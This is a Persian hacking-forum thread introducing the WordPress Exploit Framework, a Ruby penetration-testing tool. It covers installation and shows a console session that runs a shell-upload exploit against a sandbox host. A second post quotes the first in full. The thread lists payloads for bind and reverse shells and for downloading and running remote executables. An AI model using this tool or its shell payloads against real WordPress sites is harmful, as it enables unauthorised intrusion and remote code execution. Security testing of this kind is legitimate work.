SpareNet Servers Advertising & Link Exchange IranHack Telegram

اطلاعیه

Collapse
هیچ اطلاعیه ای هنوز ایجاد نشده است .

ابزار WordPress Exploit Framework

Collapse
X
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • ابزار WordPress Exploit Framework

    WordPress Exploit Framework یک کتابخانه روبی‌ست که به منطور توسعه و استفاده ماژول‌های کمک کننده در پنتست سیستم‌ها و فایل‌ها مبتنی بر وردپرس استفاده میشود.

    برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: wpf.jpg
مشاهده: 68
حجم: 42.9 کیلو بایت




    نیازمندی‌های نصب:
    اطمینان حاصل کنید که Ruby 2.2.x را بر روی سیستم خود نصب کرده‌اید؛ و بعد از نصب بودن تمامی دپندنسی‌های لازمه را با باز کردن خط فرمان/ترمینال در پوشه WPXF و ران کردن دستور bundle install ،نصب کنید.
    اگر bundler بر روی سیستم شما موجود نیست، میتوانید از دستور gem install bundler استفاده کنید.


    کد:
    sudo apt-get install build-essential patch

    قبل از ادامه دادن از نصب بودن ابزارهای ضروری برای کامپال اکستنشن‌های C اطمینان حاصل کنید.


    کد:
    sudo apt-get install ruby-dev zlib1g-dev liblzma-dev

    همچنین مطمئن شوید که فایل‌های development header بر روی سیستم شما نصب هستند.


    آموزش استفاده
    محیط ترمینال/خط فرمان کامند را از دایرکتوری که فریمورک اکسپلویت وردپرس آن را دانلود کرده باز کنید و سپس دستور ruby wpxf.rb ران کنید.
    پس از بارگیری،اااااا، از این نقطه به بعد شما میتوانید با دستور search به دنبال ماژول باشید و یا با دستور useآنها را بارگیری(لود) کنید. بارگیری یک ماژول روی محیط به شما اجازه ست کردن تنظیمات را با دستور set و همچنین نمایش اطلاعات ماژول ها را با دستور info میدهد.
    در مثال زیر نمونه‌ای از چگونگی بارگیری ماژول symposium_shell_upload exploit ، ماژول را ست کنید و با گزینه‌های اپشن بازی کنید و اکسپلویت را مقابل هدف ران کنید.


    کد:
      
    wpxf > use exploit/symposium_shell_upload [+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20> wpxf [exploit/symposium_shell_upload] > set host wp-sandbox [+] Set host => wp-sandbox wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/ [+] Set target_uri => /wordpress/ wpxf [exploit/symposium_shell_upload] > set payload exec [+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078> wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!" [+] Set cmd => echo "Hello, world!" wpxf [exploit/symposium_shell_upload] > run [-] Preparing payload... [-] Uploading the payload... [-] Executing the payload... [+] Result: Hello, world! [+] Execution finished successfully


    تفاوت بین auxiliary و ماژول‌های اکسپلویت چیست؟
    ماژول auxiliary به شما اجازه ران کردن payload را روی ماشین تارگت نمید‌هد، اما در عوض امکان استخراج اطلاعات از تارگت روا فراهم میکند. تشدید میکند.

    چه playloadهایی در دسترس هستند؟
    • : یک اسکریپت آپلود میکند که پورت مشخص شده را بایند(bind) و به WPXF اجازه برقراری ریموت شل را میدهد
    • : آپلود و اجرای اسکریپت PHP
    • : دانلود و ران کردن ریموت فایل‌های اجرایی
    • : ران کردن شل بروی سرور ریموت و برگرداندن خروجی به WPXF
    • : آپلود یک اسکریپت که یک شل TCP معکوس را برقرار میکند


  • #2
    نوشته اصلی توسط ground_master نمایش پست ها
    WordPress Exploit Framework یک کتابخانه روبی‌ست که به منطور توسعه و استفاده ماژول‌های کمک کننده در پنتست سیستم‌ها و فایل‌ها مبتنی بر وردپرس استفاده میشود.

    برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: wpf.jpg
مشاهده: 68
حجم: 42.9 کیلو بایت




    نیازمندی‌های نصب:
    اطمینان حاصل کنید که Ruby 2.2.x را بر روی سیستم خود نصب کرده‌اید؛ و بعد از نصب بودن تمامی دپندنسی‌های لازمه را با باز کردن خط فرمان/ترمینال در پوشه WPXF و ران کردن دستور bundle install ،نصب کنید.
    اگر bundler بر روی سیستم شما موجود نیست، میتوانید از دستور gem install bundler استفاده کنید.


    کد:
    sudo apt-get install build-essential patch

    قبل از ادامه دادن از نصب بودن ابزارهای ضروری برای کامپال اکستنشن‌های C اطمینان حاصل کنید.


    کد:
    sudo apt-get install ruby-dev zlib1g-dev liblzma-dev

    همچنین مطمئن شوید که فایل‌های development header بر روی سیستم شما نصب هستند.


    آموزش استفاده
    محیط ترمینال/خط فرمان کامند را از دایرکتوری که فریمورک اکسپلویت وردپرس آن را دانلود کرده باز کنید و سپس دستور ruby wpxf.rb ران کنید.
    پس از بارگیری،اااااا، از این نقطه به بعد شما میتوانید با دستور search به دنبال ماژول باشید و یا با دستور useآنها را بارگیری(لود) کنید. بارگیری یک ماژول روی محیط به شما اجازه ست کردن تنظیمات را با دستور set و همچنین نمایش اطلاعات ماژول ها را با دستور info میدهد.
    در مثال زیر نمونه‌ای از چگونگی بارگیری ماژول symposium_shell_upload exploit ، ماژول را ست کنید و با گزینه‌های اپشن بازی کنید و اکسپلویت را مقابل هدف ران کنید.


    کد:
     
    wpxf > use exploit/symposium_shell_upload [+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20> wpxf [exploit/symposium_shell_upload] > set host wp-sandbox [+] Set host => wp-sandbox wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/ [+] Set target_uri => /wordpress/ wpxf [exploit/symposium_shell_upload] > set payload exec [+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078> wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!" [+] Set cmd => echo "Hello, world!" wpxf [exploit/symposium_shell_upload] > run [-] Preparing payload... [-] Uploading the payload... [-] Executing the payload... [+] Result: Hello, world! [+] Execution finished successfully


    تفاوت بین auxiliary و ماژول‌های اکسپلویت چیست؟
    ماژول auxiliary به شما اجازه ران کردن payload را روی ماشین تارگت نمید‌هد، اما در عوض امکان استخراج اطلاعات از تارگت روا فراهم میکند. تشدید میکند.

    چه playloadهایی در دسترس هستند؟
    • : یک اسکریپت آپلود میکند که پورت مشخص شده را بایند(bind) و به WPXF اجازه برقراری ریموت شل را میدهد
    • : آپلود و اجرای اسکریپت PHP
    • : دانلود و ران کردن ریموت فایل‌های اجرایی
    • : ران کردن شل بروی سرور ریموت و برگرداندن خروجی به WPXF
    • : آپلود یک اسکریپت که یک شل TCP معکوس را برقرار میکند

    {قضاوت از خصوصی ترین و زلالترینِ حق هاست که با کوچکترین تردید به بهتانی کثیف بدل می شود.}

    نظر

    صبر کنید ..
    X